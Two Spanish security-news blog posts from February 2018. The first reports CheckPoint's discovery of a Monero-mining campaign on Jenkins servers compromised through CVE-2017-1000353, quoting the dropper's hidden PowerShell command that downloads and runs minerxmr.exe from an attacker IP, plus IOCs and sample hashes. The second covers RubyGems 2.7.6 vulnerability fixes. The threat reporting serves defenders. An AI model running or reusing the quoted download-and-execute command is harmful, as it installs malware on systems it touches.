martes, 20 de febrero de 2018

Más de 2,7 millones de euros en criptomonedas desde instalaciones de Jenkins comprometidas

El equipo de CheckPoint ha descubierto la que puede ser la mayor operación de minado de criptomonedas: el equivalente a más de 3 millones de dólares de la criptomoneda Monero (XMR) han sido generados utilizando la capacidad de procesado de miles de servidores Jenkins mal configurados.


Jenkins es un popular software de integración continua (CI) de código abierto escrito en Java. Actualmente es mantenido por la comunidad y por el proveedor de servicios de CD/CI CloudBees.

El grupo criminal, de origen chino, se ha valido de instalaciones mal configuradas o inseguras para instalar el troyano encargado de minar la criptomoneda.

Para inyectar el código malicioso, los atacantes aprovechan la vulnerabilidad etiquetada con CVE-2017-1000353 que permitirá saltar restricciones de seguridad y ejecutar comandos en la interfaz CLI de Jenkins:

  1. Primero se comprueban las capacidades y permisos del cliente víctima.
  2. En función de la respuesta anterior, se inyecta el payload que contiene entre otras cosas el código encargado del minado de la criptomoneda.

Inyección del código malicioso. Fuente: https://research.checkpoint.com

Esta segunda fase del ataque es la más interesante:

  1. Primero se ejecuta una instancia de PowerShell en segundo plano: powershell.exe -WindowStyle Hidden: 
  2. Se declara un objeto de tipo web-client: $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT
  3. El dropper descarga el software encargado del minado: $P.DownloadFile(‘http://222.184.79.11:5329/minerxmr.exe’, ‘C:\\Windows\\minerxmr.exe’)
  4. Para posteriormente ejecutarlo con el comando: START C:\\Windows\\minerxmr.exe


Los atacantes están bien organizados y distribuyen las operaciones de minado entre diferentes 'pools'. Sin embargo, todas las ganancias están centralizadas en una única cartera, que al momento de escribir la noticia, supera ya los 10829 XMR. El equivalente a unos 2,75 millones de euros al cambio.


Algunos IOCs:

Dominios e IP:

  • 222[.]184[.]79[.]11
  • 183[.]136[.]202[.]244
  • btc[.]poolbt[.]com
  • shell[.]poolbt[.]com
  • xmr[.]btgirl[.]com[.]cn
  • btc[.]btgirl[.]com[.]cn


Muestras:

SHA256: 0bb4503cc52530ddadb102fa4010fb4d89af88aca846d4b16f601d0702134246 

SHA256: 06f8eda46fd6bdc11b8ec4d18a0f0afbf3d47f82cea8363d342975896582a715

SHA256: f0430130a2f3549b1aeff0a9fb2246f68f585a7c1d312c7be385a1cf5f37e70d

SHA256: c87d294cb0384cb56f4829d58cdd3f53572d3f95c2133a9b1da5f5bc1710f22f

SHA256: f750d6da918a5f2f2c442a339821ffebcad4b61e4ca1684bac0e7df98416a794

SHA256: 3002551eebaf486d77a2b81d87db553ad8632bb132553e306395c5da589171fe

SHA256: 213a23219ff89c412f92aa1fdf7152178a81514014ee1cc4ffee97e725ee63a3

SHA256: ff8c97cd55523cbdceef80407269d35bbf78abcbf807426c12d9debe1ce498d9

SHA256: 2beaa23907c40cfcb705844f4f515ff81a788abe1aed2c8d23626d9d735968ae

SHA256: b22fa98c3ee99222c4e827a9745f206ccf7cd40530459a92f183e148b0df5ce9


Francisco Salido
fsalido@hispasec.com

Más información:

Jenkins Miner: One of the Biggest Mining Operations Ever Discovered
https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/






lunes, 19 de febrero de 2018

Corregidas múltiples vulnerabilidades en RubyGems

Rubygems, el popular gestor de paquetes para Ruby, se ha actualizado urgentemente para dar solución a un paquete de vulnerabilidades que le afectaban.

RubyGems es un gestor de paquetes para el lenguaje de programación Ruby que proporciona un formato estándar y autocontenido (llamado gem) para poder distribuir programas o bibliotecas en Ruby, una herramienta destinada a gestionar la instalación de éstos, y un servidor para su distribución.

Aunque no se ha facilitado mayor información, las vulnerabilidades corregidas han sido las siguientes:

  • Salto de restricciones (Path traversal) a la hora de escribir a un enlace simbólico de directorio.
  • Salto de restricciones (Path traversal) durante la instalación de gemas.
  • Vulnerabilidad de deserialización de objetos asociada al dueño de una gema.
  • Incorrecta gestión de los campos octales en las cabeceras de ficheros tar.
  • Incorrecta gestión de ficheros duplicados en un paquete.
  • Incorrecta validación de las URLs en el atributo spec homepage que podría facilitar ataques XSS.

Las vulnerabilidades fueron descubiertas por nmalkin, plover, Yasin Soliman y se ha publicado la versión 2.7.6 para corregirlas. Se puede actualizar a esta versión desde el propio gestor de rubygems mediante:

gem update --system


Más información:

RubyGems 2.7.6 includes security fixes: